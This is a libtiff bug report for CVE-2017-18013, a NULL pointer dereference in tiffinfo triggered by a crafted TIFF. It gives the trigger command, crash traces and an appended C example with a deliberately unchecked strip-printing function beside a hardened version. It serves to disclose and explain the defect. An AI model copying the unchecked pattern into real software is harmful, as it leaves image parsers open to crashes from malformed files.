Bug 2770 - NULL Pointer Dereference in tiffinfo.c with crafted TIFF image
Status: RESOLVED FIXED
Product: libtiff
Component: default
Version: unspecified
Hardware: All All
Importance: P2 normal
Reported: 2017-12-29 14:24 by
Modified: 2018-01-01 05:02


Attachments
Crafted TIFF Image to trigger the Crash (286 bytes, application/octet-stream)
2017-12-29 14:24, Kirit Sankar Gupta



Description From 2017-12-29 14:24:52
Created an attachment (id=838)
Crafted TIFF Image to trigger the Crash

There is a Null-Pointer Dereference occurring with tiffinfo.c in libtiff 4.0.9.
This can be triggered by running the following command:

tiffinfo -s %file%

Where a malformed TIFF file is being supplied for parsing.

The hexdump of the file causing the crash is:


The relevant Memcheck output is:

==24890== Process terminating with default action of signal 11 (SIGSEGV)
==24890==  Access not within mapped region at address 0x0
==24890==    at 0x432F02: TIFFPrintDirectory (tif_print.c:673)
==24890==    by 0x4027EF: tiffinfo (tiffinfo.c:463)
==24890==    by 0x402406: main (tiffinfo.c:152)

The NULL Pointer Dereference seems to get triggered while parsing the "1 Strips: " section of the image in the function call TIFFPrintDirectory, where an fprintf call is being made with a NULL pointer.

The output of tiffinfo while running the command on this file is:

./tiffinfo -s tiff_npd 
TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not
sorted in ascending order.
TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
TIFFReadDirectory: Warning, Photometric tag is missing, assuming data is YCbCr.
TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per
sample.
TIFFReadDirectory: Warning, SamplesPerPixel tag is missing, applying correct
SamplesPerPixel value of 3.
tiff_npd: Old-style JPEG compression support is not configured.
TIFF Directory at offset 0x8 (8)
  Image Width: 12336 Image Length: 12336
  Bits/Sample: 8
  Compression Scheme: Old-style JPEG
  Photometric Interpretation: YCbCr
  Samples/Pixel: 3
  Planar Configuration: single image plane
  1 Strips:
Segmentation fault

Debug info:

libtiff version 4.0.9
OS: Ubuntu 17.10
Compiler: gcc 7.2.0 / clang 4.0.1-6
Target: x86-64-pc-linux-gnu
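As an added illustration of the defect class described in this report (example code, not libtiff's tif_print.c), the following C shows a strip table printed from a directory that claims one strip but whose StripOffsets/StripByteCounts arrays were never populated, beside a hardened variant that validates the arrays before walking them. The struct, function names and demo values are constructed for this example.

```c
#include <stdio.h>
#include <stdint.h>

/* Hypothetical stand-in for a TIFF directory's strip bookkeeping (constructed
 * for this example, not libtiff's TIFFDirectory). A malformed file that omits
 * StripOffsets/StripByteCounts leaves both arrays NULL while nstrips != 0. */
struct strip_dir {
    uint32_t  nstrips;
    uint64_t *stripoffset;    /* NULL when the tag was missing */
    uint64_t *stripbytecount; /* NULL when the tag was missing */
};

/* Vulnerable shape: trusts nstrips, so nstrips == 1 with NULL arrays
 * dereferences address 0 while building fprintf's arguments (SIGSEGV). */
void print_strips_unchecked(FILE *fd, const struct strip_dir *td)
{
    fprintf(fd, "  %lu Strips:\n", (unsigned long)td->nstrips);
    for (uint32_t s = 0; s < td->nstrips; s++)
        fprintf(fd, "    %3lu: [%8llu, %8llu]\n", (unsigned long)s,
                (unsigned long long)td->stripoffset[s],
                (unsigned long long)td->stripbytecount[s]);
}

/* Consistency check: a non-zero strip count must come with both arrays. */
int strip_arrays_present(const struct strip_dir *td)
{
    return td->nstrips == 0 ||
           (td->stripoffset != NULL && td->stripbytecount != NULL);
}

/* Hardened shape: validate, then print. Returns the number of strips
 * printed, or -1 when the count is present but the data is absent. */
int print_strips_checked(FILE *fd, const struct strip_dir *td)
{
    if (!strip_arrays_present(td)) {
        fprintf(fd, "  %lu Strips: StripOffsets/StripByteCounts missing\n",
                (unsigned long)td->nstrips);
        return -1;
    }
    print_strips_unchecked(fd, td);  /* safe now: arrays are known non-NULL */
    return (int)td->nstrips;
}

/* Constructed directories: a well-formed one-strip image, and one shaped
 * like the crafted file (one strip claimed, no strip arrays). */
uint64_t demo_offs[1] = {8}, demo_counts[1] = {286};
struct strip_dir demo_good = {1, demo_offs, demo_counts};
struct strip_dir demo_bad  = {1, NULL, NULL};
```

Calling print_strips_checked(stdout, &demo_bad) reports the inconsistency and returns -1, where print_strips_unchecked on the same input faults at address 0.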
------- Comment #2 From 2018-01-01 05:02:30 -------
This issue has been assigned CVE-2017-18013.